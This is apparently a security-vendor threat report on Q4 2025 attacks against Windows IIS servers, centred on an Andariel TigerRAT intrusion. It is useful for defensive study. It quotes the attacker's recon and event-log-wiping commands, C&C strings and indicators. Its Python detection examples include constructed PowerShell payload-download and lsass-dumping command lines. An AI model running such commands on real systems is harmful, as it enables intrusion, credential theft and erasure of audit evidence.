Statistics Report on Malware Targeting Windows Web Servers in Q4 2025

AhnLab SEcurity intelligence Center (ASEC) is using the AhnLab Smart Defense (ASD) infrastructure to respond to and categorize attacks targeting poorly managed Windows web servers. This post will cover the damage status of Windows web servers that have become attack targets and the statistics of attacks that occurred against these servers in the fourth quarter of 2025. Additionally, it will categorize the malware strains used in each attack and provide detailed statistics.

1. Attack Status on Windows Web Servers

The following are statistics on attacks targeting Windows web servers in the 4th quarter of 2025 as identified through AhnLab Smart Defense (ASD) logs.

Aside from web shells, the malware most commonly used in these attacks consists of privilege escalation tools such as the Potato family and proxy malware, which threat actors use to gain control over the infected system. Excluding these tools, most of the remaining malware is coin miners that install XMRig.

2. Attacks in the Fourth Quarter of 2025

Attacks against Windows web servers have continued, and in the fourth quarter of 2025 a case involving the Andariel group’s TigerRAT was identified. Andariel threat actors have used TigerRAT as a backdoor to control infected systems, but there have been few cases of it being used in attacks since 2024, so the attack in October 2025 is a rare recent case. The threat actor attacked an IIS web server and executed malicious commands. The initial access method is unknown, but since the threat actor’s commands were executed by the IIS worker process (w3wp.exe), it is likely that a web shell was installed to control the infected system. The threat actor ran the following commands to collect information.

> query

> whoami

> qwinsta

> netstat -naop tcp

> tasklist

> systeminfo

> ipconfig /all

> query user

> appcmd list apppool


Figure 1. Commands executed by the threat actor on the IIS web server

Afterward, the threat actor used PowerShell to download additional payloads from external sources. The downloaded files included tools such as TigerRAT, ProcDump, PetitPotato, and PrintSpoofer.

TigerRAT is a backdoor that receives commands from the C&C server and executes them. Beyond command execution, it also supports keylogging, SOCKS tunneling, and screen capture. The version of TigerRAT used in this attack is the same type as in previous cases.


Figure 2. Class name of TigerRAT

One characteristic of TigerRAT is that an authentication step takes place before it communicates with the C&C server: the malware sends a specific string and then checks the string returned in response. The authentication strings used in this process are also the same as before.

  • Requested string: “HTTP 1.1 /index.php?member=sbi2009 SSL3.3.7”
  • Response string: “HTTP 1.1 200 OK SSL2.”

Figure 3. Packet of communication with the C&C server
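Because the two authentication strings are fixed and only imitate HTTP (a real request line starts with a method such as GET and ends with HTTP/1.x), they are a convenient network-level indicator. The following Python example, added here and not part of the ASEC report or of any AhnLab tooling, shows how a sensor could flag the TigerRAT handshake in reconstructed TCP sessions. The Session type, the sample sessions, and the filler byte appended after the response prefix are constructed for this example; the response is matched by prefix because only its beginning is reproduced above.

```python
"""Flag TCP sessions that carry the TigerRAT C&C authentication handshake."""
from dataclasses import dataclass, field

# Authentication strings reported for TigerRAT. The response is matched as a
# prefix because the report only reproduces the beginning of it.
TIGERRAT_AUTH_REQUEST = b"HTTP 1.1 /index.php?member=sbi2009 SSL3.3.7"
TIGERRAT_AUTH_RESPONSE_PREFIX = b"HTTP 1.1 200 OK SSL2."

# Methods a genuine HTTP/1.x request line can start with.
HTTP_METHODS = (b"GET ", b"POST ", b"HEAD ", b"PUT ", b"DELETE ", b"OPTIONS ", b"PATCH ")


@dataclass
class Session:
    """A reconstructed TCP session: ordered (direction, payload) segments,
    direction being "c2s" (client to server) or "s2c" (server to client)."""
    session_id: str
    segments: list = field(default_factory=list)


def first_exchange(session):
    """Return (client_bytes, server_bytes): all client data sent before the
    server's first payload, and the server's first contiguous reply.
    Joining segments handles a request split across TCP segments."""
    client, server = bytearray(), bytearray()
    seen_server = False
    for direction, payload in session.segments:
        if direction == "s2c":
            seen_server = True
            server += payload
        elif seen_server:
            break  # the first request/response pair is complete
        else:
            client += payload
    return bytes(client), bytes(server)


def is_tigerrat_handshake(session):
    """True when the client sent the TigerRAT auth string and the server
    answered with the expected auth response (both sides must match)."""
    client, server = first_exchange(session)
    return (client.startswith(TIGERRAT_AUTH_REQUEST)
            and server.startswith(TIGERRAT_AUTH_RESPONSE_PREFIX))


def classify_session(session):
    """Return "tigerrat-c2", "http" (request line is METHOD SP target SP HTTP/1.x)
    or "other". The TigerRAT string looks like HTTP but never parses as HTTP."""
    if is_tigerrat_handshake(session):
        return "tigerrat-c2"
    client, _ = first_exchange(session)
    request_line = client.split(b"\r\n", 1)[0]
    if request_line.startswith(HTTP_METHODS) and request_line.endswith((b"HTTP/1.0", b"HTTP/1.1")):
        return "http"
    return "other"


def find_tigerrat_sessions(sessions):
    """Session ids in which the full handshake was observed."""
    return [s.session_id for s in sessions if is_tigerrat_handshake(s)]


# Constructed sample sessions (not captured traffic). The byte after the
# TigerRAT response prefix is filler standing in for the rest of the reply.
SAMPLE_SESSIONS = [
    Session("sess-1", [
        ("c2s", b"HTTP 1.1 /index.php?memb"),        # request split across two segments
        ("c2s", b"er=sbi2009 SSL3.3.7"),
        ("s2c", TIGERRAT_AUTH_RESPONSE_PREFIX + b"x"),
        ("c2s", b"\x01\x00\x00\x00"),                 # later traffic, not inspected here
    ]),
    Session("sess-2", [
        ("c2s", b"GET /index.php HTTP/1.1\r\nHost: www.example.com\r\n\r\n"),
        ("s2c", b"HTTP/1.1 200 OK\r\nContent-Length: 0\r\n\r\n"),
    ]),
    Session("sess-3", [
        ("c2s", TIGERRAT_AUTH_REQUEST),              # no server reply: not confirmed
    ]),
]

if __name__ == "__main__":
    for s in SAMPLE_SESSIONS:
        print(s.session_id, classify_session(s))
```

Requiring both directions to match keeps a lone probe or scanner that sends the request string from counting as a confirmed C&C session, while the classification step makes the broader point: a proxy or IDS that enforces HTTP grammar on web ports would already see this conversation as a protocol violation, independent of the exact strings.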

The threat actor used TigerRAT to query events for the remote desktop service and then deleted the Windows event logs.

> wevtutil qe Microsoft-Windows-TerminalServices-LocalSessionManager/Operational /c:10 "/q:*[System [(EventID=25)]]" /rd:true /f:text

> wevtutil.exe cl "Application"

> for /f "tokens=*" %G in ('wevtutil.exe el') do (wevtutil.exe cl "%G")

On web servers, even when a threat actor is able to execute commands, those commands run with low privileges by default, which limits the malicious commands the threat actor can execute. Threat actors therefore frequently use PrintSpoofer and the Potato family, which abuse the access tokens of the accounts under which currently running processes execute in order to escalate privileges. In this case, the threat actor used PrintSpoofer and PetitPotato, and used ProcDump to steal credentials.
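The reconnaissance commands, the PowerShell download, the wevtutil log clearing and the ProcDump credential theft described above share one host-level trait: they run from, or descend from, the IIS worker process w3wp.exe. The following Python example, added here and not part of the ASEC report or its tooling, applies that observation as detection logic over Sysmon Event ID 1-style process-creation records (ProcessId, ParentProcessId, Image, CommandLine). The sample events, process IDs, file paths, the example.invalid URL and the renamed-ProcDump file name pd.exe are all constructed; the PowerShell download-cradle keywords are a generic list, not taken from the report.

```python
"""Flag process-creation events matching the IIS web shell activity above.

Records mimic Sysmon Event ID 1 fields (ProcessId, ParentProcessId, Image,
CommandLine). All sample events, PIDs, paths and URLs are constructed.
"""
import re
from pathlib import PureWindowsPath

WEB_SERVER_PROCESS = "w3wp.exe"  # IIS worker process
# Commands the report lists as executed from the IIS worker process.
RECON_TOOLS = {"query.exe", "whoami.exe", "qwinsta.exe", "netstat.exe",
               "tasklist.exe", "systeminfo.exe", "ipconfig.exe", "appcmd.exe"}
SHELLS = {"cmd.exe", "powershell.exe", "pwsh.exe"}
POWERSHELL = {"powershell.exe", "pwsh.exe"}

# "wevtutil cl" / "clear-log": the event log clearing seen in the attack.
LOG_CLEAR_RE = re.compile(r"\bwevtutil(\.exe)?\b.*\b(cl|clear-log)\b", re.IGNORECASE)
# Common PowerShell download cradles (generic list, not from the report).
PS_DOWNLOAD_RE = re.compile(
    r"downloadstring|downloadfile|invoke-webrequest|\biwr\b|\bwget\b|\bcurl\b",
    re.IGNORECASE)
# ProcDump was used for credential theft; because the payloads were fetched
# under innocuous names (*.gif), match the dump target rather than the tool name.
LSASS_RE = re.compile(r"\blsass(\.exe)?\b", re.IGNORECASE)


def image_name(path):
    """Lower-cased file name of a Windows image path."""
    return PureWindowsPath(path).name.lower()


def ancestors(event, by_pid):
    """Yield the parent, grandparent, ... of an event via ParentProcessId."""
    seen = set()
    pid = event["ParentProcessId"]
    while pid in by_pid and pid not in seen:
        seen.add(pid)
        yield by_pid[pid]
        pid = by_pid[pid]["ParentProcessId"]


def analyze(events):
    """Return (ProcessId, rule) findings in event order."""
    by_pid = {e["ProcessId"]: e for e in events}
    findings = []
    for e in events:
        pid, name, cmd = e["ProcessId"], image_name(e["Image"]), e["CommandLine"]
        under_iis = any(image_name(a["Image"]) == WEB_SERVER_PROCESS
                        for a in ancestors(e, by_pid))
        # Context-dependent rules: normal from an admin console, suspicious under IIS.
        if under_iis and name in SHELLS:
            findings.append((pid, "shell-from-iis"))
        if under_iis and name in RECON_TOOLS:
            findings.append((pid, "recon-from-iis"))
        if under_iis and name in POWERSHELL and PS_DOWNLOAD_RE.search(cmd):
            findings.append((pid, "powershell-download"))
        # Context-independent rules: suspicious from any process tree.
        if LOG_CLEAR_RE.search(cmd):
            findings.append((pid, "eventlog-cleared"))
        if LSASS_RE.search(cmd):
            findings.append((pid, "lsass-referenced"))
    return findings


# Constructed sample events; a parent PID with no record (50, 500, 1) stands in
# for a process that started before logging began.
SAMPLE_EVENTS = [
    {"ProcessId": 100, "ParentProcessId": 50, "Image": r"C:\Windows\System32\inetsrv\w3wp.exe",
     "CommandLine": r'c:\windows\system32\inetsrv\w3wp.exe -ap "DefaultAppPool"'},
    {"ProcessId": 200, "ParentProcessId": 100, "Image": r"C:\Windows\System32\cmd.exe",
     "CommandLine": "cmd.exe /c whoami & netstat -naop tcp"},
    {"ProcessId": 201, "ParentProcessId": 200, "Image": r"C:\Windows\System32\whoami.exe",
     "CommandLine": "whoami"},
    {"ProcessId": 202, "ParentProcessId": 200, "Image": r"C:\Windows\System32\NETSTAT.EXE",
     "CommandLine": "netstat -naop tcp"},
    {"ProcessId": 300, "ParentProcessId": 100,
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": r'powershell.exe -c "Invoke-WebRequest http://example.invalid/p.gif -OutFile C:\Windows\Temp\p.exe"'},
    {"ProcessId": 400, "ParentProcessId": 500, "Image": r"C:\Windows\System32\wevtutil.exe",
     "CommandLine": r'wevtutil.exe cl "Application"'},
    {"ProcessId": 700, "ParentProcessId": 1, "Image": r"C:\Windows\explorer.exe",
     "CommandLine": "explorer.exe"},
    {"ProcessId": 600, "ParentProcessId": 700, "Image": r"C:\Windows\System32\whoami.exe",
     "CommandLine": "whoami"},  # console user running whoami: not flagged
    {"ProcessId": 800, "ParentProcessId": 300, "Image": r"C:\Windows\Temp\pd.exe",
     "CommandLine": r"pd.exe -ma lsass.exe C:\Windows\Temp\l.dmp"},  # constructed renamed ProcDump
]

if __name__ == "__main__":
    for pid, rule in analyze(SAMPLE_EVENTS):
        print(pid, rule)
```

The ancestry walk is what separates a console administrator running whoami from the same command issued through a web shell; the two context-independent rules fire from any process tree because log clearing and reading lsass memory are rarely legitimate on a web server. Real pipelines should key the process tree on a stable identifier such as Sysmon's ProcessGuid rather than on raw PIDs, which Windows reuses.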

MD5

49b220f01699efc9e894489eef1e2567
856c20c37aa62eefbd0c11d3c3c6ecb3
8a769c4a19a9885847e5d440a24a3020
9df2dfee4bed45f0fea0f73a055d3d17
b879d552bcc4dc3ce613f921f59b457f

URL

http[:]//92[.]246[.]89[.]150/cli1[.]gif
http[:]//92[.]246[.]89[.]150/cli2[.]gif
http[:]//92[.]246[.]89[.]150/pd[.]gif
http[:]//92[.]246[.]89[.]150/pv[.]gif
http[:]//92[.]246[.]89[.]150/pv1[.]gif

FQDN

file[.]cdngoogleapi[.]com